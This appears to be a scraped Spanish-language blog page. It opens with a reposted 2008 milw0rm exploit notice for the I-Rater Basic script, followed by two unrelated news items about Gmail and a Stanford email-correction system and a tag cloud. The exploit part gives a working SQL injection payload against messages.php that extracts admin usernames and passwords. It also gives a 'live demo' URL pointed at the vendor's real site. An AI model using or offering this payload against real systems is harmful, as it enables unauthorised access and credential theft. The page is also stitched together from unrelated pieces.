#[~] Greetz : H!tm@N, KHG, chs, redc00de, pr0xy-ki11er, LiTTle-Hack3r, L1RIDON1.


#[!] Script Name: I-Rater Basic
#[!] Home Page: http://www.i-rater.com
#[!] Google_Dork: N/A
###################################################





#[~] Example:
http://localhost/Path/messages.php?idp=[exploit]

#[~]Exploit:
-9999+union+all+select+1,2,3,concat(username,char(58),password)KHG,5,6,7,8+from+admin--


#[!] Live Demo
http://www.i-rater.com/basic/messages.php?idp=-9999+union+all+select+1,2,3,concat(username,char(58),password)KHG,5,6,7,8+from+admin--


#[!] Note
To see the information go View Sources/Search "large.php?id=" ;).

##############################
#[!] Proud 2 be Albanian
#[!] Proud 2 be Muslim
#[!] United States of Albania
##############################

# milw0rm.com [2008-12-18]

http://alerta-antivirus.inteco.es/seguridad/busca_vulns.php?vervuln=200806017
http://www.milw0rm.com/exploits/7514

Gmail agrega una prueba matematica para evitar el envío erróneo de emails

SAN FRANCISCO (Reuters) - Mucha gente que ha enviado un correo electrónico mientras está enojado, cansado, ebrio o simplemente por error se ha arrepentido. Ahora, Google tiene una forma de protegerle (y a otros) de ese paso en falso.

Como parte de su cruzada para atraer usuarios a su servicio Gmail, la compañía de búsquedas por internet ha introducido decenas de prestaciones, incluyendo una que pasado un tiempo obliga al usuario a resolver un problema matemático antes de enviar el correo, dándole tiempo para pensarlo dos veces.

Debido a que Google obtiene dinero cada vez que un usuario de correo electrónico hace un clic en los anuncios, está potenciando su servicio de correo electrónico para aumentar la publicidad y quitar un porcentaje del mercado a Yahoo.

Las visitas únicas a sitios de Google aumentaron un 32 por ciento a nivel mundial, lo que es más de 775 millones visitas durante el año pasado, de acuerdo a comScore, que recopila ese tipo de información.

Leer mas

lunes, 2 de febrero de 2009

La Universidad de Stanford desarrolla un sistema de corrección de direcciones de email

A quién no le ha ocurrido que al ir a enviar un e-mail se ha olvidado de escribir un guión bajo, o que se ha saltado una vocal de ‘hotmail’, un punto…? El mensaje, evidentemente, no llega a su destinatario. Afortunadamente el correo suele avisarnos del error, que no ha podido ser entregado, mediante otro mail de respuesta. Sin embargo, éste puede llevar tiempo después, cuando el usuario ya no está frente al ordenador y no puede arreglar el entuerto.

Un problema que podría tener pronto los días contados. Un grupo de investigadores de la Universidad de Stanford ha desarrollado un sistema que corrige mediante diversos algoritmos de tecnología semántica, que reconoce y corrige en tiempo real frases y relaciones entre palabras en lugar de simplemente reconocer los caracteres introducidos de forma individual. Por ahora, el sistema ha sido probado por 6.000 personas con resultados positivos.

Aún se desconocen las empresas que implementarán la tecnología en sus servicios de correo electrónico pero los investigadores han avanzado que se han mostrado más interesadas las organizaciones para incluirlo en el trabajo y aumentar la eficiencia.

Via noticiasdot

Etiquetas

INTERNET (459) newsweek (305) SEGURIDAD (224) software (136) HACK (86) GOOGLE (47) Hacker (46) Geek (41) hardware (36) WINDOWS (34) Hackers (31) CRACK (29) facebook (29) video (28) DESCARGA (27) videos (26) Celulares (25) MICROSOFT (22) Informatica (21) apple (19) GRATIS (18) technology (18) virus (18) exploit (17) computación (16) informatico (16) web (15) cracker (14) INALAMBRICO (13) WINDOWS 7 (13) noticias (11) MSN (10) termino (10) ACTUALIZACION (9) Gamer (9) LapTops (9) Mac (9) PASSWORD (9) WINDOWS XP (9) dns (9) firefox (9) juegos (9) FOTOS (8) cientifico (8) iphone (8) WEP (7) antivirus (7) bibliografia (7) Desencriptar (6) INFINITUM (6) wifi (6) youtube (6) Craker (5) Culiacan (5) DESMOSTRACION (5) TELEFONIA (5) gmail (5) messenger (5) DIRECTA (4) DOWNLOAD (4) ESPAÑOL (4) XBOX (4) xss (4) Glosario (3) HTML (3) WPA (3) anuncios (3) ataques (3) hosting (3) hotmail (3) Guru (2) ajax (2) wpa2 (2)